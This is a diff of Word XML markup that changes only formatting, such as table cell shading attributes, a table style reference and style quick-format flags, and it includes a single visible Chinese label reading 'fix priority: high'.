             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -2851,7 +2907,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -2877,7 +2933,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -2924,7 +2980,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -2950,7 +3006,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -2976,7 +3032,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -3690,6 +3746,7 @@
     </w:p>
     <w:tbl>
       <w:tblPr>
+        <w:tblStyle w:val="8"/>
         <w:tblW w:w="0" w:type="auto"/>
         <w:tblCellSpacing w:w="15" w:type="dxa"/>
         <w:tblInd w:w="0" w:type="dxa"/>
@@ -3701,7 +3758,7 @@
           <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
         </w:tblBorders>
-        <w:shd w:val="clear"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
         <w:tblLayout w:type="autofit"/>
         <w:tblCellMar>
           <w:top w:w="15" w:type="dxa"/>
@@ -3725,7 +3782,7 @@
             <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
             <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           </w:tblBorders>
-          <w:shd w:val="clear"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
           <w:tblCellMar>
             <w:top w:w="15" w:type="dxa"/>
             <w:left w:w="15" w:type="dxa"/>
@@ -3740,7 +3797,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -3772,7 +3829,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -3804,7 +3861,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -3844,7 +3901,7 @@
             <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
             <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           </w:tblBorders>
-          <w:shd w:val="clear"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
           <w:tblCellMar>
             <w:top w:w="15" w:type="dxa"/>
             <w:left w:w="15" w:type="dxa"/>
@@ -3858,7 +3915,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -3904,7 +3961,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -3930,7 +3987,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -3964,7 +4021,6 @@
             <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
             <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           </w:tblBorders>
-          <w:shd w:val="clear"/>
           <w:tblCellMar>
             <w:top w:w="15" w:type="dxa"/>
             <w:left w:w="15" w:type="dxa"/>
@@ -3978,7 +4034,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -4024,7 +4080,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -4050,7 +4106,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -4084,7 +4140,6 @@
             <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
             <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           </w:tblBorders>
-          <w:shd w:val="clear"/>
           <w:tblCellMar>
             <w:top w:w="15" w:type="dxa"/>
             <w:left w:w="15" w:type="dxa"/>
@@ -4098,7 +4153,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -4144,7 +4199,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -4170,7 +4225,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -4204,7 +4259,6 @@
             <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
             <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           </w:tblBorders>
-          <w:shd w:val="clear"/>
           <w:tblCellMar>
             <w:top w:w="15" w:type="dxa"/>
             <w:left w:w="15" w:type="dxa"/>
@@ -4218,7 +4272,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -4264,7 +4318,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -4290,7 +4344,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -4324,7 +4378,6 @@
             <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
             <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           </w:tblBorders>
-          <w:shd w:val="clear"/>
           <w:tblCellMar>
             <w:top w:w="15" w:type="dxa"/>
             <w:left w:w="15" w:type="dxa"/>
@@ -4338,7 +4391,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -4384,7 +4437,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -4410,7 +4463,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -4444,7 +4497,7 @@
             <w:insideH w:val="none" w:color="auto" w:sz="0" w:space="0"/>
             <w:insideV w:val="none" w:color="auto" w:sz="0" w:space="0"/>
           </w:tblBorders>
-          <w:shd w:val="clear"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
           <w:tblCellMar>
             <w:top w:w="15" w:type="dxa"/>
             <w:left w:w="15" w:type="dxa"/>
@@ -4458,7 +4511,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -4504,7 +4557,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -4530,7 +4583,7 @@
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="0" w:type="auto"/>
-            <w:shd w:val="clear"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -4792,12 +4845,7 @@
         <w:t>修复优先级</w:t>
       </w:r>
       <w:r>
-        <w:t>：</w:t>
-      </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:t>高</w:t>
+        <w:t>：高</w:t>
       </w:r>
       <w:r>
         <w:br w:type="textWrapping"/>
@@ -5695,25 +5743,25 @@
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Body Text Indent 2"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Body Text Indent 3"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Block Text"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Hyperlink"/>
+    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Hyperlink"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="FollowedHyperlink"/>
     <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Strong"/>
     <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Emphasis"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Document Map"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Plain Text"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="E-mail Signature"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Normal (Web)"/>
+    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Normal (Web)"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Acronym"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Address"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Cite"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Code"/>
+    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Code"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Definition"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Keyboard"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Preformatted"/>
+    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Preformatted"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Sample"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Typewriter"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Variable"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:name="Normal Table"/>
+    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:name="Normal Table"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="annotation subject"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Simple 1"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Simple 2"/>
@@ -5970,6 +6018,7 @@
   <w:style w:type="table" w:default="1" w:styleId="8">
     <w:name w:val="Normal Table"/>
     <w:semiHidden/>
+    <w:qFormat/>
     <w:uiPriority w:val="0"/>
     <w:tblPr>
       <w:tblCellMar>
@@ -5983,6 +6032,7 @@
   <w:style w:type="paragraph" w:styleId="6">
     <w:name w:val="HTML Preformatted"/>
     <w:basedOn w:val="1"/>
+    <w:qFormat/>
     <w:uiPriority w:val="0"/>
     <w:pPr>
       <w:tabs>
@@ -6016,6 +6066,7 @@
   <w:style w:type="paragraph" w:styleId="7">
     <w:name w:val="Normal (Web)"/>
     <w:basedOn w:val="1"/>
+    <w:qFormat/>
     <w:uiPriority w:val="0"/>
     <w:pPr>
       <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
@@ -6040,6 +6091,7 @@
   <w:style w:type="character" w:styleId="11">
     <w:name w:val="Hyperlink"/>
     <w:basedOn w:val="9"/>
+    <w:qFormat/>
     <w:uiPriority w:val="0"/>
     <w:rPr>
       <w:color w:val="0000FF"/>
@@ -6049,6 +6101,7 @@
   <w:style w:type="character" w:styleId="12">
     <w:name w:val="HTML Code"/>
     <w:basedOn w:val="9"/>
+    <w:qFormat/>
     <w:uiPriority w:val="0"/>
     <w:rPr>
       <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>

</xml_diff>